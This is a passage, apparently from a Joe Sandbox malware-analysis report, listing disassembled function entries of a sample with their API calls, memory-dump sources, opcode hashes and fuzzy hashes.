                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                                                                                                                                                                                                                                                                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2999321469-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04938E38 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 049386A8: GetFileAttributesW.KERNELBASE(?), ref: 049386B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 04938F67
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesCreateDirectoryFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3401506121-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6167f84fd8789eecc1f2067891100837ad7d7966fc0f9d36921b13fb01911f6a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e61dff733f25ae44bfab86fec3475d9b869c1dda2ecbc9c1790bcfa94ae4cb3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6167f84fd8789eecc1f2067891100837ad7d7966fc0f9d36921b13fb01911f6a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11517431A1120996EF14FFB0C944BEF7379EF98301F0045A9B509E7280EB79AB44CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00444B34
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1183979061-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3031932315-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 049386A8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 049386B3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1cc23d8ae09c9733570fe5a0469a92f12f2d0844db46075661d64603bb740b11
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4E0863060910CDBCB50DAB88904AAA73E8B706316F004E64B406C7280D531AE14D750
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04938678 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 04938683
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ef4de5446ae63250b80dbc21f6fa36a72527ef4b7a323b3a72c34e07ffb419fb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BD05E3090620CABCB10DEA4990499973A89706325F004F65FA15832C0D531A9009750
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
